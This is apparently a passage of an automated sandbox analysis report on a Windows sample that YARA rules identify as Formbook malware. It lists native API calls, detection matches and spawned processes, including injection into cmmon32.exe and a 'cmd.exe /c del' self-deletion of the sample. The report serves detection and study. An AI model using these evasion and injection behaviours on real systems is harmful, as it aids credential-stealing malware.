          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009D9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009D9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009D9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009D95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009D9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009D96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009D9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009D9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009D97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009D9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009D9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009D98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009D9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009DB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009D99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009D9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009D9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009D9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009DA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009D9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009D95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009DAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009D9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009D9560 NtWriteFile,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009D96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009D9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009D9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009D9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009DA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009D9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045B9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045B95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045B9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045B9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045B96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045B96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045B9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045B9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045B9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045B9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045B9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045B99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045B9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045B9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045BAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045B9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045B95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045B9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045B9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045BA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045B9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045B9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045BA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045B9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045B97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045BB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045B9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045B98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045B98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045B9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045B99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045B9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045B9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045B9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045B9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045B9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045BA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_003B81C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_003B8270 NtReadFile,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_003B82F0 NtClose,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_003B83A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_003B81BC NtCreateFile,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_003B82EB NtClose,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_003B839B NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 0_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 0_2_00404853
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 0_2_00406131
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 0_2_73751A98
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_0041D042
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_00401030
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_0041CB69
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_00408C5B
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_00408C60
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_00402D87
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_00402D90
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_0041CF4E
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009AB090
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_00A620A8
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009C20A0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_00A628EC
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_00A6E824
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_00A51002
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009BA830
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009B99BF
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_0099F900
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009B4120
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_00A622AE
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_00A4FA2B
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009CEBB0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_00A5DBD2
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_00A503DA
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_00A62B28
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009BAB40
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009A841F
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_00A5D466
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009C2581
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009AD5E0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_00A625DD
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_00A62D07
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_00990D20
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_00A61D55
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_00A62EF7
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_009B6E30
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_00A5D616
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_00A61FF1
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 1_2_00A6DFCE
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_0463D466
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_0458841F
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_04641D55
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_04642D07
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_04570D20
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_0458D5E0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_046425DD
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045A2581
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_04596E30
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_0463D616
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_04642EF7
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_04641FF1
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_0464DFCE
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_0464E824
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_04631002
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_0459A830
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_046428EC
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_0458B090
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_046420A8
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045A20A0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_0457F900
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_04594120
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045999BF
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_0462FA2B
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_046422AE
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_0459AB40
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_04642B28
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_0463DBD2
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_046303DA
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_045AEBB0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_003BD042
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_003BCB69
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_003A8C60
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_003A8C5B
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_003A2D90
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_003A2D87
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_003BCF4E
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_003A2FB0
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: String function: 0099B150 appears 72 times
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: String function: 0457B150 appears 72 times
          Source: UGGJ4NnzFz.exe, 00000000.00000003.217329027.00000000099D6000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs UGGJ4NnzFz.exe
          Source: UGGJ4NnzFz.exe, 00000001.00000002.274341058.0000000000939000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameCMMON32.exe` vs UGGJ4NnzFz.exe
          Source: UGGJ4NnzFz.exe, 00000001.00000002.274699413.0000000000C1F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs UGGJ4NnzFz.exe
          Source: UGGJ4NnzFz.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.216556670.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.477114884.00000000041D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.477114884.00000000041D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.274258003.00000000008B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.274258003.00000000008B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.477190198.0000000004210000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.477190198.0000000004210000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.274280539.00000000008E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.274280539.00000000008E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.220100225.0000000002290000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.220100225.0000000002290000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.UGGJ4NnzFz.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.UGGJ4NnzFz.exe.2290000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.UGGJ4NnzFz.exe.2290000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.UGGJ4NnzFz.exe.2290000.3.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.UGGJ4NnzFz.exe.2290000.3.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.UGGJ4NnzFz.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/4@12/6
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Code function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 9_2_04587D72 FindResourceA,
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6676:120:WilError_01
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | File created: C:\Users\user\AppData\Local\Temp\nsyA3E2.tmp
          Source: UGGJ4NnzFz.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: UGGJ4NnzFz.exe | Virustotal: Detection: 29%
          Source: UGGJ4NnzFz.exe | ReversingLabs: Detection: 29%
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | File read: C:\Users\user\Desktop\UGGJ4NnzFz.exe
          Source: unknown | Process created: C:\Users\user\Desktop\UGGJ4NnzFz.exe 'C:\Users\user\Desktop\UGGJ4NnzFz.exe'
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Process created: C:\Users\user\Desktop\UGGJ4NnzFz.exe 'C:\Users\user\Desktop\UGGJ4NnzFz.exe'
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Windows\SysWOW64\cmmon32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UGGJ4NnzFz.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exe | Process created: C:\Users\user\Desktop\UGGJ4NnzFz.exe 'C:\Users\user\Desktop\UGGJ4NnzFz.exe'
          Source: C:\Windows\SysWOW64\cmmon32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UGGJ4NnzFz.exe'
